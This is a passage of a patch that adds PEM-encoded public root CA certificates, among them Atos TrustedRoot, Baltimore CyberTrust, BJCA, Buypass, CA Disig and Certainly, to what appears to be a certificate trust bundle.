+MTcwOTI2MjJaMEwxLjAsBgNVBAMMJUF0b3MgVHJ1c3RlZFJvb3QgUm9vdCBDQSBF +Q0MgVExTIDIwMjExDTALBgNVBAoMBEF0b3MxCzAJBgNVBAYTAkRFMHYwEAYHKoZI +zj0CAQYFK4EEACIDYgAEloZYKDcKZ9Cg3iQZGeHkBQcfl+3oZIK59sRxUM6KDP/X +tXa7oWyTbIOiaG6l2b4siJVBzV3dscqDY4PMwL502eCdpO5KTlbgmClBk1IQ1SQ4 +AjJn8ZQSb+/Xxd4u/RmAo0IwQDAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBR2 +KCXWfeBmmnoJsmo7jjPXNtNPojAOBgNVHQ8BAf8EBAMCAYYwCgYIKoZIzj0EAwMD +aAAwZQIwW5kp85wxtolrbNa9d+F851F+uDrNozZffPc8dz7kUK2o59JZDCaOMDtu +CCrCp1rIAjEAmeMM56PDr9NJLkaCI2ZdyQAUEv049OGYa3cpetskz2VAv9LcjBHo +9H1/IISpQuQo +-----END CERTIFICATE----- + +# Atos TrustedRoot Root CA RSA TLS 2021 +-----BEGIN CERTIFICATE----- +MIIFZDCCA0ygAwIBAgIQU9XP5hmTC/srBRLYwiqipDANBgkqhkiG9w0BAQwFADBM +MS4wLAYDVQQDDCVBdG9zIFRydXN0ZWRSb290IFJvb3QgQ0EgUlNBIFRMUyAyMDIx +MQ0wCwYDVQQKDARBdG9zMQswCQYDVQQGEwJERTAeFw0yMTA0MjIwOTIxMTBaFw00 +MTA0MTcwOTIxMDlaMEwxLjAsBgNVBAMMJUF0b3MgVHJ1c3RlZFJvb3QgUm9vdCBD +QSBSU0EgVExTIDIwMjExDTALBgNVBAoMBEF0b3MxCzAJBgNVBAYTAkRFMIICIjAN +BgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAtoAOxHm9BYx9sKOdTSJNy/BBl01Z +4NH+VoyX8te9j2y3I49f1cTYQcvyAh5x5en2XssIKl4w8i1mx4QbZFc4nXUtVsYv +Ye+W/CBGvevUez8/fEc4BKkbqlLfEzfTFRVOvV98r61jx3ncCHvVoOX3W3WsgFWZ +kmGbzSoXfduP9LVq6hdKZChmFSlsAvFr1bqjM9xaZ6cF4r9lthawEO3NUDPJcFDs +GY6wx/J0W2tExn2WuZgIWWbeKQGb9Cpt0xU6kGpn8bRrZtkh68rZYnxGEFzedUln +nkL5/nWpo63/dgpnQOPF943HhZpZnmKaau1Fh5hnstVKPNe0OwANwI8f4UDErmwh +3El+fsqyjW22v5MvoVw+j8rtgI5Y4dtXz4U2OLJxpAmMkokIiEjxQGMYsluMWuPD +0xeqqxmjLBvk1cbiZnrXghmmOxYsL3GHX0WelXOTwkKBIROW1527k2gV+p2kHYzy +geBYBr3JtuP2iV2J+axEoctr+hbxx1A9JNr3w+SH1VbxT5Aw+kUJWdo0zuATHAR8 +ANSbhqRAvNncTFd+rrcztl524WWLZt+NyteYr842mIycg5kDcPOvdO3GDjbnvezB +c6eUWsuSZIKmAMFwoW4sKeFYV+xafJlrJaSQOoD0IJ2azsct+bJLKZWD6TWNp0lI +pw9MGZHQ9b8Q4HECAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU +dEmZ0f+0emhFdcN+tNzMzjkz2ggwDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEB +DAUAA4ICAQAjQ1MkYlxt/T7Cz1UAbMVWiLkO3TriJQ2VSpfKgInuKs1l+NsW4AmS +4BjHeJi78+xCUvuppILXTdiK/ORO/auQxDh1MoSf/7OwKwIzNsAQkG8dnK/haZPs +o0UvFJ/1TCplQ3IM98P4lYsU84UgYt1UU90s3BiVaU+DR3BAM1h3Egyi61IxHkzJ +qM7F78PRreBrAwA0JrRUITWXAdxfG/F851X6LWh3e9NpzNMOa7pNdkTWwhWaJuyw +xfW70Xp0wmzNxbVe9kzmWy2B27O3Opee7c9GslA9hGCZcbUztVdF5kJHdWoOsAgM +rr3e97sPWD2PAzHoPYJQyi9eDF20l74gNAf0xBLh7tew2VktafcxBPTy+av5EzH4 +AXcOPUIjJsyacmdRIXrMPIWo6iFqO9taPKU0nprALN+AnCng33eU0aKAQv9qTFsR +0PXNor6uzFFcw9VUewyu1rkGd4Di7wcaaMxZUa1+XGdrudviB0JbuAEFWDlN5LuY +o7Ey7Nmj1m+UI/87tyll5gfp77YZ6ufCOB0yiJA8EytuzO+rdwY0d4RPcuSBhPm5 +dDTedk+SKlOxJTnbPP/lPqYO5Wue/9vsL3SD3460s6neFE3/MaNFcyT6lSnMEpcE +oji2jbDwN/zIIX8/syQbPYtuzE2wFg2WHYMfRsCbvUOZ58SWLs5fyQ== +-----END CERTIFICATE----- + +# Autoridad de Certificacion Firmaprofesional CIF A62634068 +-----BEGIN CERTIFICATE----- +MIIGFDCCA/ygAwIBAgIIG3Dp0v+ubHEwDQYJKoZIhvcNAQELBQAwUTELMAkGA1UE +BhMCRVMxQjBABgNVBAMMOUF1dG9yaWRhZCBkZSBDZXJ0aWZpY2FjaW9uIEZpcm1h +cHJvZmVzaW9uYWwgQ0lGIEE2MjYzNDA2ODAeFw0xNDA5MjMxNTIyMDdaFw0zNjA1 +MDUxNTIyMDdaMFExCzAJBgNVBAYTAkVTMUIwQAYDVQQDDDlBdXRvcmlkYWQgZGUg +Q2VydGlmaWNhY2lvbiBGaXJtYXByb2Zlc2lvbmFsIENJRiBBNjI2MzQwNjgwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKlmuO6vj78aI14H9M2uDDUtd9 +thDIAl6zQyrET2qyyhxdKJp4ERppWVevtSBC5IsP5t9bpgOSL/UR5GLXMnE42QQM +cas9UX4PB99jBVzpv5RvwSmCwLTaUbDBPLutN0pcyvFLNg4kq7/DhHf9qFD0sefG +L9ItWY16Ck6WaVICqjaY7Pz6FIMMNx/Jkjd/14Et5cS54D40/mf0PmbR0/RAz15i +NA9wBj4gGFrO93IbJWyTdBSTo3OxDqqHECNZXyAFGUftaI6SEspd/NYrspI8IM/h +X68gvqB2f3bl7BqGYTM+53u0P6APjqK5am+5hyZvQWyIplD9amML9ZMWGxmPsu2b +m8mQ9QEM3xk9Dz44I8kvjwzRAv4bVdZO0I08r0+k8/6vKtMFnXkIoctXMbScyJCy +Z/QYFpM6/EfY0XiWMR+6KwxfXZmtY4laJCB22N/9q06mIqqdXuYnin1oKaPnirja +EbsXLZmdEyRG98Xi2J+Of8ePdG1asuhy9azuJBCtLxTa/y2aRnFHvkLfuwHb9H/T +KI8xWVvTyQKmtFLKbpf7Q8UIJm+K9Lv9nyiqDdVF8xM6HdjAeI9BZzwelGSuewvF +6NkBiDkal4ZkQdU7hwxu+g/GvUgUvzlN1J5Bto+WHWOWk9mVBngxaJ43BjuAiUVh +OSPHG0SjFeUc+JIwuwIDAQABo4HvMIHsMB0GA1UdDgQWBBRlzeurNR4APn7VdMAc +tHNHDhpkLzASBgNVHRMBAf8ECDAGAQH/AgEBMIGmBgNVHSAEgZ4wgZswgZgGBFUd +IAAwgY8wLwYIKwYBBQUHAgEWI2h0dHA6Ly93d3cuZmlybWFwcm9mZXNpb25hbC5j +b20vY3BzMFwGCCsGAQUFBwICMFAeTgBQAGEAcwBlAG8AIABkAGUAIABsAGEAIABC +AG8AbgBhAG4AbwB2AGEAIAA0ADcAIABCAGEAcgBjAGUAbABvAG4AYQAgADAAOAAw +ADEANzAOBgNVHQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQELBQADggIBAHSHKAIrdx9m +iWTtj3QuRhy7qPj4Cx2Dtjqn6EWKB7fgPiDL4QjbEwj4KKE1soCzC1HA01aajTNF +Sa9J8OA9B3pFE1r/yJfY0xgsfZb43aJlQ3CTkBW6kN/oGbDbLIpgD7dvlAceHabJ +hfa9NPhAeGIQcDq+fUs5gakQ1JZBu/hfHAsdCPKxsIl68veg4MSPi3i1O1ilI45P +Vf42O+AMt8oqMEEgtIDNrvx2ZnOorm7hfNoD6JQg5iKj0B+QXSBTFCZX2lSX3xZE +EAEeiGaPcjiT3SC3NL7X8e5jjkd5KAb881lFJWAiMxujX6i6KtoaPc1A6ozuBRWV +1aUsIC+nmCjuRfzxuIgALI9C2lHVnOUTaHFFQ4ueCyE8S1wF3BqfmI7avSKecs2t +CsvMo2ebKHTEm9caPARYpoKdrcd7b/+Alun4jWq9GJAd/0kakFI3ky88Al2CdgtR +5xbHV/g4+afNmyJU72OwFW1TZQNKXkqgsqeOSQBZONXH9IBk9W6VULgRfhVwOEqw +f9DEMnDAGf/JOC0ULGb0QkTmVXYbgBVX/8Cnp6o5qtjTcNAuuuuUavpfNIbnYrX9 +ivAwhZTJryQCL2/W3Wf+47BVTwSYT6RBVuKT0Gro1vP7ZeDOdcQxWQzugsgMYDNK +GbqEZycPvEJdvSRUDewdcAZfpLz6IHxV +-----END CERTIFICATE----- + +# Baltimore CyberTrust Root +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIEAgAAuTANBgkqhkiG9w0BAQUFADBaMQswCQYDVQQGEwJJ +RTESMBAGA1UEChMJQmFsdGltb3JlMRMwEQYDVQQLEwpDeWJlclRydXN0MSIwIAYD +VQQDExlCYWx0aW1vcmUgQ3liZXJUcnVzdCBSb290MB4XDTAwMDUxMjE4NDYwMFoX +DTI1MDUxMjIzNTkwMFowWjELMAkGA1UEBhMCSUUxEjAQBgNVBAoTCUJhbHRpbW9y +ZTETMBEGA1UECxMKQ3liZXJUcnVzdDEiMCAGA1UEAxMZQmFsdGltb3JlIEN5YmVy +VHJ1c3QgUm9vdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKMEuyKr +mD1X6CZymrV51Cni4eiVgLGw41uOKymaZN+hXe2wCQVt2yguzmKiYv60iNoS6zjr +IZ3AQSsBUnuId9Mcj8e6uYi1agnnc+gRQKfRzMpijS3ljwumUNKoUMMo6vWrJYeK +mpYcqWe4PwzV9/lSEy/CG9VwcPCPwBLKBsua4dnKM3p31vjsufFoREJIE9LAwqSu +XmD+tqYF/LTdB1kC1FkYmGP1pWPgkAx9XbIGevOF6uvUA65ehD5f/xXtabz5OTZy +dc93Uk3zyZAsuT3lySNTPx8kmCFcB5kpvcY67Oduhjprl3RjM71oGDHweI12v/ye +jl0qhqdNkNwnGjkCAwEAAaNFMEMwHQYDVR0OBBYEFOWdWTCCR1jMrPoIVDaGezq1 +BE3wMBIGA1UdEwEB/wQIMAYBAf8CAQMwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3 +DQEBBQUAA4IBAQCFDF2O5G9RaEIFoN27TyclhAO992T9Ldcw46QQF+vaKSm2eT92 +9hkTI7gQCvlYpNRhcL0EYWoSihfVCr3FvDB81ukMJY2GQE/szKN+OMY3EU/t3Wgx +jkzSswF07r51XgdIGn9w/xZchMB5hbgF/X++ZRGjD8ACtPhSNzkE1akxehi/oCr0 +Epn3o0WC4zxe9Z2etciefC7IpJ5OCBRLbf1wbWsaY71k5h+3zvDyny67G7fyUIhz +ksLi4xaNmjICq44Y3ekQEe5+NauQrz4wlHrQMz2nZQ/1/I6eYs9HRCwBXbsdtTLS +R9I4LtD+gdwyah617jzV/OeBHRnDJELqYzmp +-----END CERTIFICATE----- + +# BJCA Global Root CA1 +-----BEGIN CERTIFICATE----- +MIIFdDCCA1ygAwIBAgIQVW9l47TZkGobCdFsPsBsIDANBgkqhkiG9w0BAQsFADBU +MQswCQYDVQQGEwJDTjEmMCQGA1UECgwdQkVJSklORyBDRVJUSUZJQ0FURSBBVVRI +T1JJVFkxHTAbBgNVBAMMFEJKQ0EgR2xvYmFsIFJvb3QgQ0ExMB4XDTE5MTIxOTAz +MTYxN1oXDTQ0MTIxMjAzMTYxN1owVDELMAkGA1UEBhMCQ04xJjAkBgNVBAoMHUJF +SUpJTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZMR0wGwYDVQQDDBRCSkNBIEdsb2Jh +bCBSb290IENBMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPFmCL3Z +xRVhy4QEQaVpN3cdwbB7+sN3SJATcmTRuHyQNZ0YeYjjlwE8R4HyDqKYDZ4/N+AZ +spDyRhySsTphzvq3Rp4Dhtczbu33RYx2N95ulpH3134rhxfVizXuhJFyV9xgw8O5 +58dnJCNPYwpj9mZ9S1WnP3hkSWkSl+BMDdMJoDIwOvqfwPKcxRIqLhy1BDPapDgR +at7GGPZHOiJBhyL8xIkoVNiMpTAK+BcWyqw3/XmnkRd4OJmtWO2y3syJfQOcs4ll +5+M7sSKGjwZteAf9kRJ/sGsciQ35uMt0WwfCyPQ10WRjeulumijWML3mG90Vr4Tq +nMfK9Q7q8l0ph49pczm+LiRvRSGsxdRpJQaDrXpIhRMsDQa4bHlW/KNnMoH1V6XK +V0Jp6VwkYe/iMBhORJhVb3rCk9gZtt58R4oRTklH2yiUAguUSiz5EtBP6DF+bHq/ +pj+bOT0CFqMYs2esWz8sgytnOYFcuX6U1WTdno9uruh8W7TXakdI136z1C2OVnZO +z2nxbkRs1CTqjSShGL+9V/6pmTW12xB3uD1IutbB5/EjPtffhZ0nPNRAvQoMvfXn +jSXWgXSHRtQpdaJCbPdzied9v3pKH9MiyRVVz99vfFXQpIsHETdfg6YmV6YBW37+ +WGgHqel62bno/1Afq8K0wM7o6v0PvY1NuLxxAgMBAAGjQjBAMB0GA1UdDgQWBBTF +7+3M2I0hxkjk49cULqcWk+WYATAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQE +AwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAUoKsITQfI/Ki2Pm4rzc2IInRNwPWaZ+4 +YRC6ojGYWUfo0Q0lHhVBDOAqVdVXUsv45Mdpox1NcQJeXyFFYEhcCY5JEMEE3Kli +awLwQ8hOnThJdMkycFRtwUf8jrQ2ntScvd0g1lPJGKm1Vrl2i5VnZu69mP6u775u ++2D2/VnGKhs/I0qUJDAnyIm860Qkmss9vk/Ves6OF8tiwdneHg56/0OGNFK8YT88 +X7vZdrRTvJez/opMEi4r89fO4aL/3Xtw+zuhTaRjAv04l5U/BXCga99igUOLtFkN +SoxUnMW7gZ/NfaXvCyUeOiDbHPwfmGcCCtRzRBPbUYQaVQNW4AB+dAb/OMRyHdOo +P2gxXdMJxy6MW2Pg6Nwe0uxhHvLe5e/2mXZgLR6UcnHGCyoyx5JO1UbXHfmpGQrI ++pXObSOYqgs4rZpWDW+N8TEAiMEXnM0ZNjX+VVOg4DwzX5Ze4jLp3zO7Bkqp2IRz +znfSxqxx4VyjHQy7Ct9f4qNx2No3WqB4K/TUfet27fJhcKVlmtOJNBir+3I+17Q9 +eVzYH6Eze9mCUAyTF6ps3MKCuwJXNq+YJyo5UOGwifUll35HaBC07HPKs5fRJNz2 +YqAo07WjuGS3iGJCz51TzZm+ZGiPTx4SSPfSKcOYKMryMguTjClPPGAyzQWWYezy +r/6zcCwupvI= +-----END CERTIFICATE----- + +# BJCA Global Root CA2 +-----BEGIN CERTIFICATE----- +MIICJTCCAaugAwIBAgIQLBcIfWQqwP6FGFkGz7RK6zAKBggqhkjOPQQDAzBUMQsw +CQYDVQQGEwJDTjEmMCQGA1UECgwdQkVJSklORyBDRVJUSUZJQ0FURSBBVVRIT1JJ +VFkxHTAbBgNVBAMMFEJKQ0EgR2xvYmFsIFJvb3QgQ0EyMB4XDTE5MTIxOTAzMTgy +MVoXDTQ0MTIxMjAzMTgyMVowVDELMAkGA1UEBhMCQ04xJjAkBgNVBAoMHUJFSUpJ +TkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZMR0wGwYDVQQDDBRCSkNBIEdsb2JhbCBS +b290IENBMjB2MBAGByqGSM49AgEGBSuBBAAiA2IABJ3LgJGNU2e1uVCxA/jlSR9B +IgmwUVJY1is0j8USRhTFiy8shP8sbqjV8QnjAyEUxEM9fMEsxEtqSs3ph+B99iK+ ++kpRuDCK/eHeGBIK9ke35xe/J4rUQUyWPGCWwf0VHKNCMEAwHQYDVR0OBBYEFNJK +sVF/BvDRgh9Obl+rg/xI1LCRMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD +AgEGMAoGCCqGSM49BAMDA2gAMGUCMBq8W9f+qdJUDkpd0m2xQNz0Q9XSSpkZElaA +94M04TVOSG0ED1cxMDAtsaqdAzjbBgIxAMvMh1PLet8gUXOQwKhbYdDFUDn9hf7B +43j4ptZLvZuHjw/l1lOWqzzIQNph91Oj9w== +-----END CERTIFICATE----- + +# Buypass Class 2 Root CA +-----BEGIN CERTIFICATE----- +MIIFWTCCA0GgAwIBAgIBAjANBgkqhkiG9w0BAQsFADBOMQswCQYDVQQGEwJOTzEd +MBsGA1UECgwUQnV5cGFzcyBBUy05ODMxNjMzMjcxIDAeBgNVBAMMF0J1eXBhc3Mg +Q2xhc3MgMiBSb290IENBMB4XDTEwMTAyNjA4MzgwM1oXDTQwMTAyNjA4MzgwM1ow +TjELMAkGA1UEBhMCTk8xHTAbBgNVBAoMFEJ1eXBhc3MgQVMtOTgzMTYzMzI3MSAw +HgYDVQQDDBdCdXlwYXNzIENsYXNzIDIgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEB +BQADggIPADCCAgoCggIBANfHXvfBB9R3+0Mh9PT1aeTuMgHbo4Yf5FkNuud1g1Lr +6hxhFUi7HQfKjK6w3Jad6sNgkoaCKHOcVgb/S2TwDCo3SbXlzwx87vFKu3MwZfPV +L4O2fuPn9Z6rYPnT8Z2SdIrkHJasW4DptfQxh6NR/Md+oW+OU3fUl8FVM5I+GC91 +1K2GScuVr1QGbNgGE41b/+EmGVnAJLqBcXmQRFBoJJRfuLMR8SlBYaNByyM21cHx +MlAQTn/0hpPshNOOvEu/XAFOBz3cFIqUCqTqc/sLUegTBxj6DvEr0VQVfTzh97QZ +QmdiXnfgolXsttlpF9U6r0TtSsWe5HonfOV116rLJeffawrbD02TTqigzXsu8lkB +arcNuAeBfos4GzjmCleZPe4h6KP1DBbdi+w0jpwqHAAVF41og9JwnxgIzRFo1clr +Us3ERo/ctfPYV3Me6ZQ5BL/T3jjetFPsaRyifsSP5BtwrfKi+fv3FmRmaZ9JUaLi +FRhnBkp/1Wy1TbMz4GHrXb7pmA8y1x1LPC5aAVKRCfLf6o3YBkBjqhHk/sM3nhRS +P/TizPJhk9H9Z2vXUq6/aKtAQ6BXNVN48FP4YUIHZMbXb5tMOA1jrGKvNouicwoN +9SG9dKpN6nIDSdvHXx1iY8f93ZHsM+71bbRuMGjeyNYmsHVee7QHIJihdjK4TWxP +AgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMmAd+BikoL1Rpzz +uvdMw964o605MA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAU18h +9bqwOlI5LJKwbADJ784g7wbylp7ppHR/ehb8t/W2+xUbP6umwHJdELFx7rxP462s +A20ucS6vxOOto70MEae0/0qyexAQH6dXQbLArvQsWdZHEIjzIVEpMMpghq9Gqx3t +OluwlN5E40EIosHsHdb9T7bWR9AUC8rmyrV7d35BH16Dx7aMOZawP5aBQW9gkOLo ++fsicdl9sz1Gv7SEr5AcD48Saq/v7h56rgJKihcrdv6sVIkkLE8/trKnToyokZf7 +KcZ7XC25y2a2t6hbElGFtQl+Ynhw/qlqYLYdDnkM/crqJIByw5c/8nerQyIKx+u2 +DISCLIBrQYoIwOula9+ZEsuK1V6ADJHgJgg2SMX6OBE1/yWDLfJ6v9r9jv6ly0Us +H8SIU653DtmadsWOLB2jutXsMq7Aqqz30XpN69QH4kj3Io6wpJ9qzo6ysmD0oyLQ +I+uUWnpp3Q+/QFesa1lQ2aOZ4W7+jQF5JyMV3pKdewlNWudLSDBaGOYKbeaP4NK7 +5t98biGCwWg5TbSYWGZizEqQXsP6JwSxeRV0mcy+rSDeJmAc61ZRpqPq5KM/p/9h +3PFaTWwyI0PurKju7koSCTxdccK+efrCh2gdC/1cacwG0Jp9VJkqyTkaGa9LKkPz +Y11aWOIv4x3kqdbQCtCev9eBCfHJxyYNrJgWVqA= +-----END CERTIFICATE----- + +# Buypass Class 3 Root CA +-----BEGIN CERTIFICATE----- +MIIFWTCCA0GgAwIBAgIBAjANBgkqhkiG9w0BAQsFADBOMQswCQYDVQQGEwJOTzEd +MBsGA1UECgwUQnV5cGFzcyBBUy05ODMxNjMzMjcxIDAeBgNVBAMMF0J1eXBhc3Mg +Q2xhc3MgMyBSb290IENBMB4XDTEwMTAyNjA4Mjg1OFoXDTQwMTAyNjA4Mjg1OFow +TjELMAkGA1UEBhMCTk8xHTAbBgNVBAoMFEJ1eXBhc3MgQVMtOTgzMTYzMzI3MSAw +HgYDVQQDDBdCdXlwYXNzIENsYXNzIDMgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEB +BQADggIPADCCAgoCggIBAKXaCpUWUOOV8l6ddjEGMnqb8RB2uACatVI2zSRHsJ8Y +ZLya9vrVediQYkwiL944PdbgqOkcLNt4EemOaFEVcsfzM4fkoF0LXOBXByow9c3E +N3coTRiR5r/VUv1xLXA+58bEiuPwKAv0dpihi4dVsjoT/Lc+JzeOIuOoTyrvYLs9 +tznDDgFHmV0ST9tD+leh7fmdvhFHJlsTmKtdFoqwNxxXnUX/iJY2v7vKB3tvh2PX +0DJq1l1sDPGzbjniazEuOQAnFN44wOwZZoYS6J1yFhNkUsepNxz9gjDthBgd9K5c +/3ATAOux9TN6S9ZV+AWNS2mw9bMoNlwUxFFzTWsL8TQH2xc519woe2v1n/MuwU8X +KhDzzMro6/1rqy6any2CbgTUUgGTLT2G/H783+9CHaZr77kgxve9oKeV/afmiSTY +zIw0bOIjL9kSGiG5VZFvC5F5GQytQIgLcOJ60g7YaEi7ghM5EFjp2CoHxhLbWNvS +O1UQRwUVZ2J+GGOmRj8JDlQyXr8NYnon74Do29lLBlo3WiXQCBJ31G8JUJc9yB3D +34xFMFbG02SrZvPAXpacw8Tvw3xrizp5f7NJzz3iiZ+gMEuFuZyUJHmPfWupRWgP +K9Dx2hzLabjKSWJtyNBjYt1gD1iqj6G8BaVmos8bdrKEZLFMOVLAMLrwjEsCsLa3 +AgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFEe4zf/lb+74suwv +Tg75JbCOPGvDMA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAACAj +QTUEkMJAYmDv4jVM1z+s4jSQuKFvdvoWFqRINyzpkMLyPPgKn9iB5btb2iUspKdV +cSQy9sgL8rxq+JOssgfCX5/bzMiKqr5qb+FJEMwx14C7u8jYog5kV+qi9cKpMRXS +IGrs/CIBKM+GuIAeqcwRpTzyFrNHnfzSgCHEy9BHcEGhyoMZCCxt8l13nIoUE9Q2 +HJLw5QY33KbmkJs4j1xrG0aGQ0JfPgEHU1RdZX33inOhmlRaHylDFCfChQ+1iHsa +O5S3HWCntZznKWlXWpuTekMwGwPXYshApqr8ZORK15FTAaggiG6cX0S5y2CBNOxv +033aSF/rtJC8LakcC6wc1aJoIIAE1vyxjy+7SjENSoYc6+I2KSb12tjE8nVhz36u +dmNKekBlk4f4HoCMhuWG1o8O/FMsYOgWYRqiPkN7zTlgVGr18okmAWiDSKIz6MkE +kbIRNBE+6tBDGR8Dk5AM/1E9V/RBbuHLoL7ryWPNbczk+DaqaJ3tvV2XcEQNtg41 +3OEMXbugUZTLfhbrES+jkkXITHHZvMmZUldGL1DPvTVp9D0VzgalLA8+9oG6lLvD +u79leNKGef9JOxqDDPDeeOzI8k1MGt6CKfjBWtrt7uYnXuhF0J0cUahoq0Tj0Itq +4/g7u9xN12TyUb7mqqta6THuBrxzvxNiCp/HuZc= +-----END CERTIFICATE----- + +# CA Disig Root R2 +-----BEGIN CERTIFICATE----- +MIIFaTCCA1GgAwIBAgIJAJK4iNuwisFjMA0GCSqGSIb3DQEBCwUAMFIxCzAJBgNV +BAYTAlNLMRMwEQYDVQQHEwpCcmF0aXNsYXZhMRMwEQYDVQQKEwpEaXNpZyBhLnMu +MRkwFwYDVQQDExBDQSBEaXNpZyBSb290IFIyMB4XDTEyMDcxOTA5MTUzMFoXDTQy +MDcxOTA5MTUzMFowUjELMAkGA1UEBhMCU0sxEzARBgNVBAcTCkJyYXRpc2xhdmEx +EzARBgNVBAoTCkRpc2lnIGEucy4xGTAXBgNVBAMTEENBIERpc2lnIFJvb3QgUjIw +ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCio8QACdaFXS1tFPbCw3Oe +NcJxVX6B+6tGUODBfEl45qt5WDza/3wcn9iXAng+a0EE6UG9vgMsRfYvZNSrXaNH +PWSb6WiaxswbP7q+sos0Ai6YVRn8jG+qX9pMzk0DIaPY0jSTVpbLTAwAFjxfGs3I +x2ymrdMxp7zo5eFm1tL7A7RBZckQrg4FY8aAamkw/dLukO8NJ9+flXP04SXabBbe +QTg06ov80egEFGEtQX6sx3dOy1FU+16SGBsEWmjGycT6txOgmLcRK7fWV8x8nhfR +yyX+hk4kLlYMeE2eARKmK6cBZW58Yh2EhN/qwGu1pSqVg8NTEQxzHQuyRpDRQjrO +QG6Vrf/GlK1ul4SOfW+eioANSW1z4nuSHsPzwfPrLgVv2RvPN3YEyLRa5Beny912 +H9AZdugsBbPWnDTYltxhh5EF5EQIM8HauQhl1K6yNg3ruji6DOWbnuuNZt2Zz9aJ +QfYEkoopKW1rOhzndX0CcQ7zwOe9yxndnWCywmZgtrEE7snmhrmaZkCo5xHtgUUD +i/ZnWejBBhG93c+AAk9lQHhcR1DIm+YfgXvkRKhbhZri3lrVx/k6RGZL5DJUfORs +nLMOPReisjQS1n6yqEm70XooQL6iFh/f5DcfEXP7kAplQ6INfPgGAVUzfbANuPT1 +rqVCV3w2EYx7XsQDnYx5nQIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud +DwEB/wQEAwIBBjAdBgNVHQ4EFgQUtZn4r7CU9eMg1gqtzk5WpC5uQu0wDQYJKoZI +hvcNAQELBQADggIBACYGXnDnZTPIgm7ZnBc6G3pmsgH2eDtpXi/q/075KMOYKmFM +tCQSin1tERT3nLXK5ryeJ45MGcipvXrA1zYObYVybqjGom32+nNjf7xueQgcnYqf +GopTpti72TVVsRHFqQOzVju5hJMiXn7B9hJSi+osZ7z+Nkz1uM/Rs0mSO9MpDpkb +lvdhuDvEK7Z4bLQjb/D907JedR+Zlais9trhxTF7+9FGs9K8Z7RiVLoJ92Owk6Ka ++elSLotgEqv89WBW7xBci8QaQtyDW2QOy7W81k/BfDxujRNt+3vrMNDcTa/F1bal +TFtxyegxvug4BkihGuLq0t4SOVga/4AOgnXmt8kHbA7v/zjxmHHEt38OFdAlab0i +nSvtBfZGR6ztwPDUO+Ls7pZbkBNOHlY667DvlruWIxG68kOGdGSVyCh13x01utI3 +gzhTODY7z2zp+WsO0PsE6E9312UBeIYMej4hYvF/Y3EMyZ9E26gnonW+boE+18Dr +G5gPcFw0sorMwIUY6256s/daoQe/qUKS82Ail+QUoQebTnbAjn39pCXHR+3/H3Os +zMOl6W8KjptlwlCFtaOgUxLMVYdh84GuEEZhvUQhuMI9dM9+JDX6HAcOmz0iyu8x +L4ysEr3vQCj8KWefshNPZiTEUxnpHikV7+ZtsH8tZ/3zbBt1RqPlShfppNcL +-----END CERTIFICATE----- + +# Certainly Root E1 +-----BEGIN CERTIFICATE----- +MIIB9zCCAX2gAwIBAgIQBiUzsUcDMydc+Y2aub/M+DAKBggqhkjOPQQDAzA9MQsw +CQYDVQQGEwJVUzESMBAGA1UEChMJQ2VydGFpbmx5MRowGAYDVQQDExFDZXJ0YWlu +bHkgUm9vdCBFMTAeFw0yMTA0MDEwMDAwMDBaFw00NjA0MDEwMDAwMDBaMD0xCzAJ +BgNVBAYTAlVTMRIwEAYDVQQKEwlDZXJ0YWlubHkxGjAYBgNVBAMTEUNlcnRhaW5s +eSBSb290IEUxMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3m/4fxzf7flHh4axpMCK ++IKXgOqPyEpeKn2IaKcBYhSRJHpcnqMXfYqGITQYUBsQ3tA3SybHGWCA6TS9YBk2 +QNYphwk8kXr2vBMj3VlOBF7PyAIcGFPBMdjaIOlEjeR2o0IwQDAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU8ygYy2R17ikq6+2uI1g4 +hevIIgcwCgYIKoZIzj0EAwMDaAAwZQIxALGOWiDDshliTd6wT99u0nCK8Z9+aozm +ut6Dacpps6kFtZaSF4fC0urQe87YQVt8rgIwRt7qy12a7DLCZRawTDBcMPPaTnOG +BtjOiQRINzf43TNRnXCve1XYAS59BWQOhriR +-----END CERTIFICATE----- + +# Certainly Root R1 +-----BEGIN CERTIFICATE----- +MIIFRzCCAy+gAwIBAgIRAI4P+UuQcWhlM1T01EQ5t+AwDQYJKoZIhvcNAQELBQAw +PTELMAkGA1UEBhMCVVMxEjAQBgNVBAoTCUNlcnRhaW5seTEaMBgGA1UEAxMRQ2Vy +dGFpbmx5IFJvb3QgUjEwHhcNMjEwNDAxMDAwMDAwWhcNNDYwNDAxMDAwMDAwWjA9 +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJQ2VydGFpbmx5MRowGAYDVQQDExFDZXJ0 +YWlubHkgUm9vdCBSMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANA2 +1B/q3avk0bbm+yLA3RMNansiExyXPGhjZjKcA7WNpIGD2ngwEc/csiu+kr+O5MQT 